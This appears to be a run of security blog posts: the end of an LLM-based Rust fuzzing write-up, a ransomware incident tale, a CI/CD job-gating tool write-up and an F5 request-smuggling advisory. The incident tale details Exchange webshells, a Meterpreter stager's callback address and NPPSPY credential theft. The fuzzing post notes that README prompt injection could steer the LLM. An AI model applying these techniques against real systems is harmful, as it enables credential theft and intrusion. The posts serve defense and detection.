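    for path_info in doc.get("paths", {}).values():
        if path_info.get("kind") == "function":
            functions.append("::".join(path_info["path"]))
    return sorted(functions)

example = '''{"paths": {
  "0:1": {"kind": "function", "path": ["mylib", "mymod", "func"]},
  "0:2": {"kind": "struct",   "path": ["mylib", "MyStruct"]}}}'''
print(public_functions(example))  # prints ['mylib::mymod::func']
```

Because the paths come straight from the compiler, the import line of the generated fuzz target can be derived mechanically instead of guessed by the LLM.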
Getting the import path right is one thing, but that won’t produce a useful fuzz target on its own. To get closer to that, we give a score to each function based on the type of arguments it takes, the number of arguments it takes, and the name of the function itself. For example, a function that contains “parse” in its name may be a good target to fuzz. Also, a function that only takes a byte array as input looks like something that would be easy to call automatically. We select the top 8 functions based on their score, and for each of these functions, we try generating a fuzz target that calls that function using a template. If the build fails, we fall back to asking the LLM to fix it.
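A toy version of such a scoring heuristic is shown below. The keyword list, weights, and type strings are invented for illustration; Fuzzomatic's actual values differ.

```python
# Illustrative scoring heuristic; keywords and weights are invented,
# not Fuzzomatic's actual values.
FUZZ_FRIENDLY = {"parse", "decode", "load", "deserialize", "from_str"}

def score_function(name: str, arg_types: list[str]) -> int:
    score = 0
    if any(k in name.lower() for k in FUZZ_FRIENDLY):
        score += 10                      # parser-like names are promising
    if arg_types == ["&[u8]"]:
        score += 10                      # a single byte slice is ideal
    score -= max(0, len(arg_types) - 1)  # penalize many arguments
    return score

ranked = sorted(
    [("parse_header", ["&[u8]"]), ("new", ["usize", "bool", "&str"])],
    key=lambda f: score_function(*f),
    reverse=True,
)
print(ranked[0][0])  # prints parse_header
```

The top-scoring functions are then plugged into a fuzz-target template, one per target.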
Another challenge is to convert the random input bytes into the appropriate type the function takes as an argument. This can become even more complicated when a function has multiple arguments of different types.
In that case, we leverage the Arbitrary crate to split those bytes and automatically convert them into the required types the function takes as arguments. This way, we support any combination of arguments of a supported type.
This approach works surprisingly well and is able to produce useful targets most of the time, as long as there is at least one public function with arguments of a supported type.
We ran Fuzzomatic on the top 50 most starred GitHub projects written in Rust that matched the search terms “parser library”. We detected 6 projects that were already doing some sort of fuzzing and 1 project that was not a Cargo project, so we skipped those. There were also 6 projects that did not build, so these were discarded as well. This left us with 37 candidate projects.
Out of those 37 projects, no approach worked for 2 projects. For each of the other 35 projects, at least one fuzz target was generated that compiled successfully. That’s a 95% success rate.
Among those 35 projects, only one yielded no useful fuzz target. In total, at least one useful fuzz target was generated for 34 of the 37 projects, a 92% success rate. We also found at least one bug in 14 projects, or 38% of those projects.
The whole process took less than 12 hours. On average, it took 18 minutes to process a project where at least one successful fuzz target was generated. But we’ve seen some take just over two minutes and others take as long as 57 minutes. These numbers cover the whole process, including compilation time.
Considering projects where bugs were found, the “functions” approach was the most successful: 77% of the fuzz targets that found a bug were generated with it. It was followed by the README approach (12% of those targets), the examples approach (8%), and finally the benchmarks approach (4%).
When we look at useful generated fuzz targets, the “functions” approach is still the most efficient with 62% of targets generated with that approach. It is followed by the examples approach (13% of useful targets), the unit tests approach (12%), the README approach (10%) and finally the benchmarks approach with 1% of useful targets.
The OpenAI API costs summed up to 2.90 USD, which is quite cheap considering this ran on 50 projects. Usually, it only costs a few cents to run Fuzzomatic on a project.
What kind of bugs did we find? Those 14 bugs were composed of:
Most of the bugs we found crash the software under test. This may not hold under different conditions, though, depending on how the project is built: integer overflows are not checked by default when a Rust program is compiled in release mode. In that scenario, the program would not crash and may silently produce unexpected behavior that could lead to a vulnerability.
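If crashing on overflow is preferred over silent wrapping, Cargo's profile settings can keep overflow checks enabled even in release builds. This is a standard Cargo option, shown here as a minimal fragment:

```toml
# Cargo.toml: keep integer-overflow checks in release builds so that
# overflows panic instead of silently wrapping.
[profile.release]
overflow-checks = true
```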
We’ve shown that this is possible and worked in most cases, but that’s clearly not the case for every code base out there. Here are some requirements:
If a single top-level item in that list is not fulfilled, then this will likely not succeed.
The results we obtained show that for parser libraries, Fuzzomatic was pretty effective. This strategy can find low-hanging fruit automatically when the right conditions are present, but it won’t be as effective as manually writing a fuzz target with in-depth knowledge of the target code base. However, when it does succeed in finding a bug, it usually does so much faster than it would have taken to get familiar with the code base and manually write a fuzz target for it.
Even if the generated fuzz target does not build, it may still serve as a starting point for manually writing a good fuzz target. Maybe automatically producing a building fuzz target did not work, but the fix may be obvious to a person reviewing the generated code. Starting from a draft that perhaps has an import issue but already calls an interesting function, rather than starting from scratch, can save developers a lot of time.
Sometimes, bugs are found, but they may not be exploitable. Even if the bugs found are not directly exploitable, that result in itself provides useful information. Indeed, if some bugs can be found automatically in a code base, it is likely that there is more to be found in that code base, and it opens the path for a more in-depth review of that code base. Also, the bug may not cause any security issues at all, but it’s still nice to fix it anyway.
Fuzzomatic can be used as a defensive measure to protect one’s own open source project. It’s very easy to run. There are only a few requirements that must be respected.
Fuzzomatic focuses on projects written in Rust, so it is required that the target code base is written in that language.
The project must build successfully when running “cargo build”. A project that does not build cannot be fuzzed. This is probably the most important requirement: there are tons of GitHub projects out there that simply do not build.
Functions in your code base should be designed to be tested. One common pitfall we’ve seen in many libraries is exposing a function that takes a path to a file as an argument but not exposing any function that takes the contents of a file directly, for example, as a string or as a byte array. This is an anti-pattern that needs to stop. When designing a library, make sure that your functions are easy to test. This way, automated fuzzing will be much more effective.
Finally, any external non-Rust dependency should already be installed on the system where Fuzzomatic will run. Fuzzomatic currently doesn’t support installing non-Rust dependencies and won’t do it automatically.
To achieve its goal, Fuzzomatic may run untrusted code, so make sure to always run it in an isolated environment. Indeed, it will build untrusted projects. Building untrusted code is a security concern because we never know what’s inside the build script.
Fuzzomatic will also run arbitrary code output by an LLM. Imagine what would happen if, for example, the README file of a project contained malicious instructions, and Fuzzomatic built a prompt with it and called the LLM. The LLM may respond with a malicious code snippet that would be built and run.
Also, if Fuzzomatic is run against an unknown code base, there is no way to know what the functions that will be called will do. An unknown function may very well delete files or perform other destructive operations.
Therefore, always make sure to run Fuzzomatic in an isolated environment.
Fuzzomatic can run in your CI/CD pipeline. It can also be used once to bootstrap fuzzing for projects that don’t do any fuzzing at all. It saves time and can identify which functions of your codebase should be called and will write the fuzz target for you. In some cases, it will even find runtime bugs in your code, such as panics or overflows.
Fuzzomatic can also be set to run on a large number of projects, hoping to find bugs automatically through fuzzing. We’ve shown that this approach works and found 14 bugs out of 50 parser libraries.
If sending parts of the source code to OpenAI is a problem, fear not. There are plenty of alternatives. We’ve seen that the Mistral 7B instruct model also works, and it can be hosted locally. With tools like LM Studio, a local inference server can be set up in just a few clicks. Then, since that server is API compatible with OpenAI, it’s as easy as setting the OPENAI_API_BASE environment variable to http://localhost:1234/v1, and then Fuzzomatic can run using the model of your choice on your own server. Your code remains private.
There are other approaches we didn’t try or implement. One example is to extract code snippets that are inside docstrings. Many projects include code examples inside multi-line comments that document modules or functions. These examples could be fed to the LLM to generate a fuzz target.
Even though the Rust ecosystem guarantees some structure in most projects, that structure can quickly become complex. Fuzzomatic does support quite a bit of Cargo’s features and is capable of handling Cargo workspace projects with multiple workspace member crates for example. However, we haven’t tried to support all Cargo features, such as [build-dependencies], [patch.crates-io] or target-specific dependencies, to name a few, and there are still projects where Fuzzomatic may fail because of this.
External non-Rust dependencies are a problem and are one of the reasons why some projects would not build by default. Automatically installing these would help with automated fuzzing from scratch.
The default branch of a repository may not always be in a building state. Another strategy may be to check out the latest tag or release and target that instead of the latest commit.
Optimizations regarding costs and benefits when using commercial LLMs may be implemented. For example, retrying with a larger model (such as GPT-4) when all other approaches fail. This way, we first try a cost-effective approach, and then use a more expensive one as a last resort. This could be an option to avoid exceeding budgets quickly.
Sometimes, the LLM enters a code fix loop where it suggests the same fix over and over again, which doesn’t help in making the fuzz target compile. Detecting these cases and failing fast would reduce costs and runtime.
Unit tests sometimes contain test vectors that could be used to automatically generate a seed corpus. So far, we haven’t used a seed corpus at all. Doing so may significantly speed up the discovery of bugs while the fuzzer runs.
Some bugs may not be found because the fuzzer didn’t run for long enough. Currently, Fuzzomatic runs fuzzers for 10 seconds only. An improvement may be to do a 2nd pass on useful fuzz targets and re-run them for a longer time, hoping to find more bugs.
Adding support for more function argument types would improve the effectiveness of Fuzzomatic’s functions approach: for example, support for generic types and more primitive types. Also, being able to generate fuzz targets that instantiate structs and call struct methods would help cover more of a code base.
To help as many developers as possible improve the security of their code, it would be even better to support other programming languages, such as C/C++, Java, Python and Go.
We’ve shown that it is possible to generate fuzz targets that successfully build completely from scratch and that do something useful for Cargo-based projects. We’ve even found crashes in code bases completely automatically with this technique.
For security reasons, make sure to always run Fuzzomatic in an isolated environment.
Fuzzomatic is open source and available on GitHub. We hope that open-sourcing this tool will help projects find bugs in their own code and improve their overall security posture. We also hope to contribute to automated fuzzing research by sharing what we learned along the way while performing this experiment.
In this installment of Tales from the Incident Response Cliff Face, we’ll take a look at a recent engagement, which involved a string of events that spanned several months.
The focus: ransomware with assisted initial access.

An initial attacker broke into the victim’s environment, established a foothold throughout, and then advertised it for sale on the dark net.
The victim, however, was an NGO that cared for the most vulnerable. For some reason – perhaps the weak financial incentive, perhaps a sense of morals – the access rights to the victim’s environment sat on the marketplace for a full eight months before they were eventually purchased by a second attacker.
In this report, we will elaborate on how the unprepared victim was set up for this ransomware event and, as usual, share some insights to help you avoid being caught in the same trap.
In a nutshell, we will cover:

Our engagement started nearly two weeks after the ransomware detonation. While the client, fortunately, managed to leverage spare backups to perform restoration and avoid business disruption, it did mean that their intervention contaminated the crime scene and that full visibility into the cyber kill chain would be impossible.
Initial triage of forensic collections revealed that the on-premise Exchange server played a central role in the threat actor’s operation by being the source of the RDP internal lateral movement.
To make matters worse, the lack of patching since 2021, coupled with exposure to the internet, would have almost certainly meant that it had already been hit by the “Proxy-something” wave of Exchange exploits (ProxyLogon, ProxyShell, and friends).
This hunch was quickly confirmed to be correct. While the usual logs to hunt for this family of Exchange CVEs have only been available since mid-August 2023 and did not show any traces of exploitation, we did manage to find two webshells on disk. I could not determine the previously installed version of Exchange and therefore can’t say with confidence which of these were exploited:
However, working on the assumption that this was a known CVE, it was safe to assume that it must have been one of these.
The two webshells were lightly obfuscated to avoid static disk detection but remained simple (as shown by Figures 1-4, below). They would execute whatever was in the cadataKey request parameter and then either force a 404 or redirect to another page.
My assumption is that this was a way to make it harder for Blue Team operators to identify webshell interactions and reduce the risk of being discovered by their usual technique of filtering on .aspx requests coupled with a 200 return code.




The timestamps on these two files indicate that they were created back in December 2022. Furthermore, as shown in Figure 5, I discovered that a file had been created a couple of seconds before the first webshell.
This file masqueraded as the ApacheBench command line utility but quickly proved to be a Meterpreter stager. The Meterpreter stager is built on a template executable, which allows the malicious shellcode to be injected into the .text section.

This stager then communicated with 103.112.232.44:443 to get the rest of the Meterpreter payload. In our investigation, however, it became evident that ours was not the only host reaching out to it (see Figure 6). Behind that particular IP was a compromised Exchange server that was used to compromise other vulnerable Exchange servers.
This is a classic case of launching an attack from another victim – so the hackers can hide their identity.


The forensic analysis revealed that NoEscape managed to perform lateral movement via RDP with the domain admin account. After confirming that the latter was not performed in restricted admin mode, which would require the NT Hash only, the usual question was on the table once again: How did the attacker obtain the clear text password?
A fair guess would be that the attacker got hold of it by exploiting the previously mentioned CVEs that give local system privileges on the Exchange server. If, as was the case here, a decent AV/EDR solution was missing, dumping credentials from the LSASS process would become child’s play and provide easy access to the domain admins credentials, which would likely be cached on the Exchange server.
But a fair guess, in this case, is not a correct guess!
In this case, LSASS did not contain cleartext credentials since WDigest was not enabled. Furthermore, the NTLM hash would not have been easily cracked either, since the customer confirmed they were using complex 18-character passwords. Finally, the password did not appear to be stored in common credential stores, nor in plain-text or script files.
Suddenly, answering how the attacker achieved this privilege escalation became really interesting. To find answers, we had to go back to the textbooks.
What we know about cleartext passwords is that their lifetime in modern systems is short. A cleartext password only exists while it is being acquired; as soon as the credential needs to be validated (be it locally or remotely), the password is hashed and the cleartext form is basically lost for good. This means that it’s only possible to obtain the cleartext form in a small number of other ways. The most basic involves listening to the interactive logon process. This is what keyloggers do (as their name suggests) by collecting keystrokes. More refined techniques specifically target the Windows interactive logon process. A famously documented technique involves Windows Authentication Providers, which comprise two groups: Security Support Providers and Network Providers. We will focus on the latter in our tale.
If you are curious to know more about Security support providers and the different techniques for stealing cleartext credentials, read more here:
https://www.scip.ch/en/?labs.20220217
The technique to steal cleartext credentials by abusing Network Providers has a 2020 implementation under the name NPPSPY
https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy (I also found descriptions of the technique dating back to the early 2000s)
https://www.giac.org/paper/gcih/117/microsoft-network-provider-exploit/101145
TL;DR: A neat visual explains how the technique works. The DLL needs to be registered in the registry, by declaring a network provider, for it to be called.

The documented steps of the technique would mean that the attacker would have had to make some changes in the registry, so this gave us a lead to test the NPPSPY hypothesis. When we queried the registry for traces of the exploit, we found a new network provider had been introduced (see Figure 7).

As shown in Figure 7, we found from our investigation that an ntoskrnl.dll had been maliciously placed in the system32 folder (Windows does not use ntoskrnl.dll, only ntoskrnl.exe) and a dummy network provider named credman had been created, which pointed to the DLL. Interestingly, the registry key’s LastWriteTime was February 28th, 2023.
Given that this technique requires admin privileges that allow a user to make changes in the registry (something the exploitation of the Exchange vulnerabilities can grant) we made the link between the two exploitation events.
In fact, malicious .NET compilation artefacts from around the same time as the registry modification led us to believe that the Exchange vulnerability may have been exploited multiple times.
The next step was to analyze the malicious dll (ntoskrnl.dll) to determine where it had stored the looted files. Existing threat intelligence on this dll gave us this information (Figure 8).

Most importantly, we can see that it generated the following file “C:\ProgramData\Package Cache\Windows10.0-KB5009543-x64.msu”. A quick inspection of the file’s content in the compromised server revealed the stolen passwords in cleartext:

A lot of what we do on the investigation front is driven by our intuition. Our hunches. We explore these and see if they bear fruit. So, what was supposed to be a simple confirmation of the NPPSPY technique with some admin users’ passwords sparked my curiosity: there were a lot of accounts in the file, far more than you’d normally expect to see on a typical Exchange server (which should be solely admin users). It seemed that every regular domain user had their credentials stored here. The idea that they had all interactively logged onto it would be totally implausible.
Or so we thought…
Going from ‘How was it possible for the attacker to find the cleartext password?’ we moved onto the question ‘Why were so many regular domain user credentials on the Exchange server?’
We suspected that the scope of the technique covered in the documentation could – in certain conditions – be widely extended. The intuitive explanation was that somehow, it must have captured mailbox-related authentications. Looking up NPPSPY in conjunction with Exchange Server I found only one blog post that gave me the information I needed:
This post suggests that using NPPSPY on an Exchange server would sweep up all mail-related authentications. Interesting as this may be, the blog post didn’t cover why, how, or under what conditions.
This left me on the hunt for further validation, so I proceeded to reproduce it in my lab against a fresh default installation of Exchange Server 2019.
My approach was to log in using different methods (OWA, ECP, PowerShell, etc.) and see which login attempts would interact with the loot file, thus suggesting credential theft.
For example, when logging in via OWA, I get the following hit (see Figure 10).


Figure 11 shows that the initiating process was the Microsoft Exchange Outlook WebApp (OWA). Based on what I found, I checked the stack trace (Figure 12).

The stack trace confirmed that OWA authentication went through the Malicious Network Provider and called the NPLogonNotify API for loot.dll.
Interestingly, the stack trace also showed that authbas.dll was involved. As shown in Figure 13 below, this is the DLL responsible for the IIS BasicAuthenticationModule.
As soon as I realized this, the fog cleared and it all became crystal clear.

The authentication process had proceeded by invoking LogonUserExW (see Figure 46.). This literally behaved as if authentication was being made to a local computer, just as we would expect to see from the documentation of NPPSPY with Interactive/Remote Interactive Logons.

After this step, Mpr.dll was called. As a reminder, MPR stands for Multiple Provider Router; it handles communication with the installed network providers. Mpr.dll checks the registry to determine which providers are registered and then goes through them, one by one.
So just as we thought, our malicious network provider was called and our dll was triggered via the exported NPLogonNotify. The credentials were then passed down to it and ended up in the text file as indicated by the call to WriteFile (Figure 11, above). Note that the functionality of NPLogonNotify is arbitrarily set by the attacker. In this case, the attacker deemed it sufficient just to write credentials to a text file, but they could have done something more complex, e.g., send the credentials over the network, which would have removed any trace on the disk.
Thus, we were able to confirm that the threat actor did abuse IIS Basic authentication with the NPPSPY technique to place himself into every Exchange web authentication.
The corresponding event log for this Exchange Web Authentication corroborates our observations about IIS Basic Authentication as the logon attempt is Type 8: network clear text (Figure 15).

The reason I focused on this attack was to explore the new elements it comprised and offer guidance on detection and prevention.
Unfortunately, the DLL used in this test, which is based on the NPPSPY repository but recompiled with literally no sophistication at all to avoid AV/EDR detection, successfully evaded endpoint security solutions. That says a lot about the power of this technique, even though it is expensive for the attacker, as it requires admin privileges. Note that I am working with the assumption that admin privileges should never give an attacker the ability to roam freely if a proper AV/EDR is in place.
So, if AV/EDRs seem to be blind to it for now, I suggest focusing on the registry changes that enabled this attack. Any attacker will have to announce his network provider along with the DLL. This means that such changes need to be closely monitored. We appreciate that monitoring requires some resource commitment, as shown by the number of registry changes that are made in our customer base, but this is where something like long-tail analysis can weed out false positives. Sysmon and EDRs have telemetry for commands, process execution, and registry changes and can be leveraged for hunting and detections. Windows Event Logs can be leveraged as well but require explicit auditing.
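As a starting point for such hunting, one can baseline the comma-separated "ProviderOrder" value under HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order and alert on new entries. Below is a minimal, platform-independent sketch; the baseline set is an example (typical Windows defaults), not a universal one, and must be tuned per environment.

```python
# Hunting sketch: flag unexpected entries in the NetworkProvider
# "ProviderOrder" registry value. The baseline below lists common
# default providers; real environments may legitimately have more.
BASELINE = {"RDPNP", "LanmanWorkstation", "webclient"}

def suspicious_providers(provider_order: str, baseline=BASELINE) -> list[str]:
    """Return providers not in the known-good baseline (case-insensitive)."""
    known = {p.lower() for p in baseline}
    return [p for p in provider_order.split(",") if p and p.lower() not in known]

# In the incident above, a rogue "credman" provider had been added:
print(suspicious_providers("RDPNP,LanmanWorkstation,webclient,credman"))  # prints ['credman']
```

The same comparison can be wired into Sysmon or EDR registry telemetry to alert at modification time rather than on periodic sweeps.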
For more information read the following article:
We want to prevent credential collection of users that log into the Exchange Server (or any Windows host), including those of users authenticating via OWA/ECP.
For users of Windows 11, Microsoft has released the 22H2 Security Baseline, which includes a new setting, “Enable MPR notifications for the system”. As described above, Microsoft recommends setting it to ‘disabled’ to prevent password disclosure to providers (exceptions apply).
This is a sniper fix – useful if you don’t use providers.
If you don’t use Windows 11, one way is to use the recommended Protected Users Group in Active Directory. I tested this against the technique and can confirm that it inhibits the MPR notifications (the mpnotify.exe process is not spawned after login). Unfortunately, I cannot explain the internals of it and can only deduce from what Microsoft says about “Protected Users Group” that cleartext credentials die too early (Figure 16).

There’s no such thing as a silver bullet though. So, keep in mind that there are side effects to adding users to this group.
This recommendation applies to LSASS credential dumping as well since they are no longer cached.
Regarding the credentials stolen via IIS Basic Authentication when using Outlook on the Web: Basic Authentication is enabled by default and is necessary for OWA/ECP to work (Figure 17).

Disclaimer: I am no Exchange administrator
Like many incident responders, though, I can consume Microsoft documentation. So, I tried disabling Basic Authentication and enabling the other types of authentication, but this broke functionality. I did not spend time digging into alternative ways to determine whether I could make it work.
However, the Microsoft recommendation for on-prem non-hybrid environments is to move from Basic Authentication to Modern Authentication with ADFS for Outlook on the Web (OWA/ECP). This would also allow the usage of stronger authentication features like enabling MFA.
If you do this, be sure not to use Basic Auth in ADFS as it would only shift the problem to another server.

Eight months after the first Exchange compromise, we observed interactions with the webshells that were followed by Anydesk installation in unattended access mode so that user approval would not be required (Figure 18).

From the Exchange server, the threat actor then used Nmap/Zenmap to scan the network, and PowerShell to enumerate the shares in the domain using Invoke-ShareFinderThreaded from PowerView.

For more information:
Note that this is not the first threat actor to use such a technique; it has been widely used not only for host discovery but also to discover the location of company data.
The threat actor then checked who was logged into a server before RDPing into it with the domain admin account (remember, he had successfully stolen the cleartext password via the malicious NPPSPY DLL and written it to disk). Forensic analysis on the hosts where lateral movement was performed shows that the threat actor identified data and inspected some of it manually by opening some files. The restored environment would not show us exactly how data exfiltration was performed, but the firewall logs did show significant outgoing traffic towards IPs that belonged to the mega.co domain.
Given the large delay (8 months) between the first evidence of NPPSPY usage and NoEscape active engagement with the target, it is unlikely that the ransomware actors are behind the exploitation attempts cited so far. We believe NoEscape bought access in the form of cleartext passwords and webshell locations from Initial Access Brokers.
If you are curious about the economics, read https://www.kelacyber.com/the-secret-life-of-an-initial-access-broker/

In this Incident Response Cliff Face tale we investigated a ransomware operator that managed to act on a victim’s environment quickly and efficiently, but whose privileged access was facilitated by a much earlier compromise.
Here are some simple things you can do to prevent this chain of events happening in your organization:
Click here to download the full case study, including the 5 recommendations.
At Kudelski Security (KS), we make heavy use of a self-hosted GitLab instance for all our code, including our applications, cloud environment configuration, and user management.
Using GitLab CI/CD, we run the tests, builds, and deployments to our various environments, as well as manage security devices via their APIs.
However, as KS doesn’t have full control over the GitLab instance, which is managed by a third party, we face limitations in configuring security controls that align with our specific use cases.
This led us to the question: how do we safeguard our secure environments while hosting the code and executing it from our GitLab instance?
The solution we came up with involves building a custom runner, known as YouShallNotPass, which acts as a gatekeeper. Its primary role is to determine whether GitLab CI/CD jobs should be allowed to run on GitLab runners within our secure network environment.
Schematically, it looks like this:

In this blog post, we will introduce and showcase our open-source implementation, YouShallNotPass, designed to enhance the security of GitLab and GitHub pipelines executions.
In our pursuit of enhancing security for CI/CD pipelines, it is crucial to define a threat model that identifies potential risks and malicious actors.
We defined the following Threat Model:


Our threat model considers two personas: a malicious user with access to the git project, and a malicious admin on the code collaboration platform such as GitLab or GitHub.
The scenarios identified as High-Risk are:
Those risks led us to define the following four security controls that we need to be able to configure with YouShallNotPass:
Our CI/CD job validation solution, known as YouShallNotPass (YSNP), is available as a proof of concept on GitHub. YSNP is designed to enhance the security of CI/CD pipelines and ensure that only pre-approved jobs run in a trusted and controlled environment.
From an architecture perspective, we have the following three key parts:
We consider both the Custom Runner and Vault to be in a secure environment, where we can put in place the security controls we want.
A diagram detailing the components can be seen below:

Compared to a job executed by a normal runner, our custom runner adds a validation step using YSNP and Vault (3) before executing the job (4) and (5); the job only runs if the checks defined on Vault pass.
It is important to note that Vault, the GitLab runner, and the CI/CD platform (GitLab) operate independently from each other. For instance, the GitLab runner’s configuration is managed directly on the host, with GitLab having no access to its configuration.
Our custom runner is composed of two parts:
A custom executor is simply a set of user-provided scripts that can be executed before, during, or after the job; we will describe them in the next sections.
For GitLab, this is done through the custom executor which uses four scripts, one for each stage: config_exec, prepare_exec, run_exec, cleanup_exec.
Those scripts can be found on our repo here for interested readers, but in short:
Key Insights from GitLab Custom Executor Development:
While our primary CI/CD platform is GitLab, we explored the use of GitHub’s self-hosted runner feature, which, with some adaptation, proved to be functional for our needs. GitHub’s self-hosted runners lack GitLab’s advanced custom executor concept but allow us to run scripts before and after jobs.
The before_script.sh (available here) performs the following tasks:
Note that during job execution on GitHub Actions, the job log is not visible until the job concludes. This is a challenge when the before_script is waiting for user interaction to delete the scratch code, since the log cannot yet show the user the necessary link.
YSNP is a Golang application that is called by the custom executors defined above to perform the validation against configurations stored on Vault.
The custom executors call YSNP with the appropriate environment variables. Here are some of the most important ones:
For the full list of variables utilized by YSNP, see here.
The high-level algorithm is the following:
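The decision the runner makes can be sketched roughly as follows. This is a simplified Python model with hypothetical names and data shapes chosen for illustration; YSNP itself is a Go application, and its real logic lives in the repository.

```python
import hashlib
from dataclasses import dataclass

@dataclass
class Job:
    name: str
    script: str
    image_digest: str

def validate_job(job: Job, whitelist: dict, config: dict):
    """Sketch of the allow/deny decision (not YSNP's real API).

    Returns (allowed, pending_checks): allowed is True only when both the
    job script and the container image were pre-approved; pending_checks
    lists any extra per-job checks (e.g. user MFA) still to be performed.
    """
    script_hash = hashlib.sha256(job.script.encode()).hexdigest()
    allowed = (script_hash in whitelist["scripts"]
               and job.image_digest in whitelist["images"])
    pending = config.get("checks", {}).get(job.name, [])
    return allowed, pending

# Hypothetical Vault-stored configuration for one repository.
whitelist = {
    "scripts": {hashlib.sha256(b"make build").hexdigest()},
    "images": {"sha256:0123abcd"},
}
config = {"checks": {"user_mfa_job": ["user_mfa"]}}

good = Job("build", "make build", "sha256:0123abcd")
evil = Job("build", "curl https://attacker.example/x.sh | sh", "sha256:0123abcd")
print(validate_job(good, whitelist, config))  # (True, [])
print(validate_job(evil, whitelist, config))  # (False, [])
```

The key property is that the allow/deny decision is driven entirely by data stored in Vault, outside the CI/CD platform's reach.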
YSNP’s ability to validate CI/CD job executions is driven by configuration files stored in Vault. These files define the criteria for job validation, including image and script whitelisting, and which checks are required.
YSNP relies on two essential configuration files stored in Vault:
1. Whitelist configuration: This JSON-based file contains image and script hashes approved for execution within a specific Git repository. It ensures that only validated images and scripts are allowed to run. A sample whitelist configuration might look like this:

2. youshallnotpass_config: This configuration file configures YSNP itself and defines which checks are required, per job or globally.

For example, the config file above simply states that the job called “user_mfa_job” has a single check, which validates the user executing the job.
By default, YSNP conducts the following validation checks:
More information about the available options for configuring this file can be found in the Project Configuration Options section.
To prevent malicious users from deleting job logs to conceal their activities, we’ve implemented a feature that logs runner activities to a Mattermost channel. This feature operates at the namespace level and is described in more detail here.
Vault is a great tool for a key-value store as it provides features for granular access using Access Control Lists (ACLs) and transparent authentication using OIDC. In addition, it has all the API endpoints required that we call from YSNP.
The three important points to understand are:
Those steps with the appropriate commands are in the README in the GitLab Runner Setup and GitHub Support (Experimental) sections.
To maintain the reliability and functionality of the GitLab custom executor in conjunction with YSNP, we’ve implemented integration tests under testing/scripts. These tests also provide insights into the setup of our Git repository and Vault.
The architecture of those docker-compose files available under testing/integration looks like this:

The integrations tests’ directories are composed of two docker-compose files:
The vault-compose.yml: this Docker setup file defines the configuration for HashiCorp Vault. It is accompanied by the script vault-init.sh, which configures Vault with:
The runner-compose.yml Docker file configures the custom runner (named gitlab_runner in the diagram above) containing both the custom executor and the YSNP application.
The custom runner is set up using the git-init.sh script, which does the following:
This setup is required to mimic the git clone as if it came from GitLab when a job would start.
Now we can simply start the custom runner with the exec command, which runs a job locally without having to pull it from GitLab.
Note that this exec command was deprecated in this issue because it does not support all the features a normal runner needs when running a job.
However due to the popularity of this feature, GitLab is now investigating how to run pipelines locally.
For simplicity, we added youshallnotpass_builder_daemon which allows to rebuild the go application without having to relaunch the full docker compose.
In this section, we explore three key use cases that illustrate how YouShallNotPass (YSNP) effectively addresses and mitigates potential threats, safeguarding CI/CD pipelines from unauthorized access and malicious activities:
This scenario simulates a case where a GitLab runner with access to sensitive internal machines is assigned to an entire namespace (group_with_sensitive_repos). This configuration would allow all repositories under the namespace to use the runner for job execution.
However, on Vault, we have only whitelisted a specific repo (repo_name) in that namespace (while the two other entries are the configuration files at the namespace level):

When a malicious user tries to launch a job (e.g., malicious_job) from an unauthorized repository (repo_unauthorized) using the YSNP custom runner, a failure message is triggered, thwarting unauthorized job execution.
We can see the failure message in the screenshot below:

This scenario mimics a user with access to an approved repository and its associated runner, who attempts to maliciously modify the CI/CD configuration. The aim is to redirect environment variables, including secrets, to an attacker-controlled server.

When YSNP runs, it checks whether the script above has been pre-approved in its configuration on Vault.
Since this script does not match the hash of the previously allowed script, the job fails, as we can see in the screenshot below.

Here, allowed_script is the entry found in the whitelist configuration of that repo on Vault.
The final use case we want to present is related to a recent CVE that was published for GitLab: CVE-2023-5207 where an authenticated attacker could impersonate another user when launching a pipeline.
This could allow the attacker to launch a job which only specific users should be allowed to.
When the attacker impersonates the user (with the email address [email protected]) to launch a job, they would see this message (up to line 66):

Now, the attacker would also need to be able to login to Vault with the impersonated user.name to be able to delete the scratch code that was generated by YSNP.
If the attacker does not delete the scratch code, after some time, YSNP will make the job fail (lines 67-68).
Vault ACLs need to be configured in such a way that only user.name has access to the path of the secret to delete it.
As we conclude this blog post, we want to reiterate the importance of securing CI/CD pipelines and the significant role that our open-source custom runner solution, YouShallNotPass (YSNP), plays in this endeavor. The following key takeaways encapsulate the essence of our discussion.
CI/CD platforms are known to be highly valuable targets for threat actors due to their importance to modern organizations. Since we consider the CI/CD platform a less trusted environment than the one where the code itself is executed (i.e., the runner and the machines reachable from it), security checks must be applied to protect against unauthorized use.
These security checks are added as YSNP configuration stored on HashiCorp Vault in the trusted environment, which is managed independently from the CI/CD platform, placing it out of reach of a CI/CD platform compromise.
YouShallNotPass allows you to:
All of this before any job execution happens on the runner.
We currently use this solution daily to protect our most sensitive runners and CI/CD jobs.
We welcome any feedback on our GitHub repo and let’s meet at Black Alps 2023 where we will present our solution!
Written by Scott Emerson of the Kudelski Security Threat Detection & Research Team
Researchers at Praetorian have discovered a request smuggling vulnerability that could be leveraged to bypass authentication and achieve remote code execution on F5 BIG-IP appliances. The vulnerability impacts systems where the Traffic Management User Interface (TMUI) is exposed to untrusted networks like the internet. An attacker can exploit how requests are parsed differently between the frontend and backend systems to forge requests, which in this particular context allows for privileged remote code execution. The vulnerability was assigned CVE-2023-46747 and is a close relative of CVE-2022-26377.
F5 BIG-IP appliances running the Apache HTTP Server and Tomcat components are vulnerable if the TMUI is accessible from external networks. By exploiting differences in how requests are handled, an attacker can bypass authentication checks intended to restrict access to administrative interfaces.
Vulnerable BIG-IP Versions
Vulnerable versions and fixes introduced:
- 17.1.0: fixed in 17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG
- 16.1.0 – 16.1.4: fixed in 16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG
- 15.1.0 – 15.1.10: fixed in 15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG
- 14.1.0 – 14.1.5: fixed in 14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG
- 13.1.0 – 13.1.5: fixed in 13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG
Further details in F5’s advisory.
The vulnerability allows an attacker to construct HTTP requests that would be interpreted differently by the frontend and backend systems interacting over the Apache JServ Protocol (AJP). By abusing differences in how headers like Transfer-Encoding are processed, a follow-up request can be smuggled in and handled unexpectedly. This allows authentication bypass and the remote execution of commands with root privileges if left unpatched.
